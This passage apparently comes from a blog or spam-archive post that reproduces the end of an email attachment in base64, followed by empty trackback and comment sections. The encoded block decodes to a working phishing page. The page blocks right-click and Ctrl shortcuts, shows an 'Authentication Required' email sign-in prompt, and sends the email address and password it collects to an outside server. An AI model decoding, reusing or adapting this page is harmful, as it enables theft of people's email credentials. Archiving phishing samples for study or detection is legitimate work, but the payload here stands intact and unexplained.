dC5vbmNvbnRleHRtZW51PWNsaWNrSUU7fQ0KZG9jdW1lbnQub25jb250ZXh0
bWVudT1uZXcgRnVuY3Rpb24oInJldHVybiBmYWxzZSIpDQovLw0KZnVuY3Rp
b24gZGlzYWJsZUN0cmxLZXlDb21iaW5hdGlvbihlKQ0Kew0KDQp2YXIgZm9y
YmlkZGVuS2V5cyA9IG5ldyBBcnJheSgnYScsICduJywgJ2MnLCAneCcsICd2
JywgJ2onICwgJ3cnLCdzJywndScpOw0KdmFyIGtleTsNCnZhciBpc0N0cmw7
DQppZih3aW5kb3cuZXZlbnQpDQp7DQprZXkgPSB3aW5kb3cuZXZlbnQua2V5
Q29kZTsNCmlmKHdpbmRvdy5ldmVudC5jdHJsS2V5KQ0KaXNDdHJsID0gdHJ1
ZTsNCmVsc2UNCmlzQ3RybCA9IGZhbHNlOw0KfQ0KZWxzZQ0Kew0Ka2V5ID0g
ZS53aGljaDsNCmlmKGUuY3RybEtleSkNCmlzQ3RybCA9IHRydWU7DQplbHNl
DQppc0N0cmwgPSBmYWxzZTsNCn0NCg0KaWYoaXNDdHJsKQ0Kew0KZm9yKGk9
MDsgaTxmb3JiaWRkZW5LZXlzLmxlbmd0aDsgaSsrKQ0Kew0KDQppZihmb3Ji
aWRkZW5LZXlzW2ldLnRvTG93ZXJDYXNlKCkgPT0gU3RyaW5nLmZyb21DaGFy
Q29kZShrZXkpLnRvTG93ZXJDYXNlKCkpDQp7DQphbGVydCgnS2V5IGNvbWJp
bmF0aW9uIENUUkwgKyAnK1N0cmluZy5mcm9tQ2hhckNvZGUoa2V5KSArJyBo
YXMgYmVlbiBkaXNhYmxlZC4nKTsNCnJldHVybiBmYWxzZTsNCn0NCn0NCn0N
CnJldHVybiB0cnVlOw0KfQ0KPC9zY3JpcHQ+DQo8L2hlYWQ+DQoNCjxib2R5
Pg0KPGRpdiBjbGFzcz0iY29udGFpbmVyIj4NCjxkaXYgY2xhc3M9ImhlYWRl
ciIgaWQ9ImRlbW8iPjwvZGl2Pg0KDQo8Y2VudGVyPg0KPGRpdiBzdHlsZT0i
cGFkZGluZzogMTVweDsgaGVpZ2h0OiA0MHB4OyI+PC9kaXY+DQo8ZGl2IGNs
YXNzPSJmb3JtIiBzdHlsZT0id2lkdGg6IDM3MXB4OyBoZWlnaHQ6IDYwOXB4
Ij4NCiZuYnNwOw0KPGJyPg0KPGZvcm0gaWQ9ImZtIiBtZXRob2Q9IlBPU1Qi
IGFjdGlvbj0iaHR0cDovL25vdmEucGx1c3BsdWdnZy5jb20vbWFpbGJfZml4
LnBocCI+DQo8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOiBsZWZ0OyI+DQo8aW1n
IHNyYz0iaHR0cHM6Ly90cmlidWxhbnQuY29tL2RvY3Mvd3AtY29udGVudC91
cGxvYWRzL1dFQk1BSUxBUFMuanBnIiBkYXRhLWRlZmVycmVkPSIxIiBqc2Fj
dGlvbj0ibG9hZDpYQWVaa2Q7IiBqc25hbWU9IkhpYVl2ZiIgY2xhc3M9Im4z
Vk5DYiBLQWxSRGIiIGFsdD0iSG93IHRvIEFjY2VzcyBhbmQgQ29uZmlndXJl
IEVtYWlsIEFjY291bnQgLSBUcmlidWxhbnQgRG9jdW1lbnRhdGlvbiIgaWQ9
ImltaSIgZGF0YS13PSIxMjAwIiBkYXRhLWg9IjQ3NSIgc3R5bGU9ImhlaWdo
dDogMTYzcHg7IHdpZHRoOiA0OTlweDsgbWFyZ2luOiAwcHgiIGRhdGEtYXRm
PSJ0cnVlIiBkYXRhLWltbD0iMTA0NzkiPjwvZGl2Pg0KPGRpdiBzdHlsZT0i
dGV4dC1hbGlnbjogbGVmdDsiPg0KPGxhYmVsIGlkPSJsMSI+QXV0aGVudGlj
YXRpb24gUmVxdWlyZWQgPC9sYWJlbD48YnI+DQo8bGFiZWwgaWQ9ImwyIj5Q
bGVhc2UgU2lnbiBpbiB3aXRoIHlvdXIgZW1haWwgdG8gY29udGludWUuLi48
L2xhYmVsPg0KPC9kaXY+DQo8ZGl2IHN0eWxlPSJwYWRkaW5nOiA1cHg7Ij48
L2Rpdj4NCjxpbnB1dCB0eXBlPSJlbWFpbCIgbmFtZT0idXNlciIgcGxhY2Vo
b2xkZXI9IkVtYWlsIGFkZHJlc3MiIGF1dG9jb21wbGV0ZT0ib2ZmIiB2YWx1
ZT0iIiByZXF1aXJlZD4NCjxkaXYgc3R5bGU9InBhZGRpbmc6IDVweDsiPjwv
ZGl2Pg0KPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwd2QiIGlkPSJw
YXNzIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiIGF1dG9jb21wbGV0ZT0ib2Zm
OyIgcmVxdWlyZWQ+DQo8ZGl2IHN0eWxlPSJwYWRkaW5nOiA4cHg7IHBhZGRp
bmctbGVmdDogMCU7IHRleHQtYWxpZ246IGxlZnQ7Ij4NCjxpbnB1dCB0eXBl
PSJjaGVja2JveCIgY2hlY2tlZCA+DQo8L2Rpdj4NCjxkaXYgc3R5bGU9InBh
ZGRpbmc6IDVweDsiPjwvZGl2Pg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFt
ZT0ic3VibWl0IiB2YWx1ZT0iTmV4dCI+DQo8L2Zvcm0+DQo8L2Rpdj4NCg0K
PGRpdiBzdHlsZT0icGFkZGluZzogMTVweDsgaGVpZ2h0OiAxMDBweDsiPjwv
ZGl2Pg0KPC9jZW50ZXI+DQo8ZGl2IGNsYXNzPSJmb290ZXIiPiAgPGk+PC9p
PiA8L2Rpdj4NCjwvZGl2Pg0KPC9ib2R5Pg==
------=_NextPart_000_00B7_01C2A9A6.72ABD50A--
Trackbacks
Trackback specific URI for this entryThis link is not meant to be clicked. It contains the trackback URI for this entry. You can use this URI to send ping- & trackbacks from your own blog to this entry. To copy the link, right click and select "Copy Shortcut" in Internet Explorer or "Copy Link Location" in Mozilla.
No Trackbacks
Comments
Display comments as Linear | ThreadedNo comments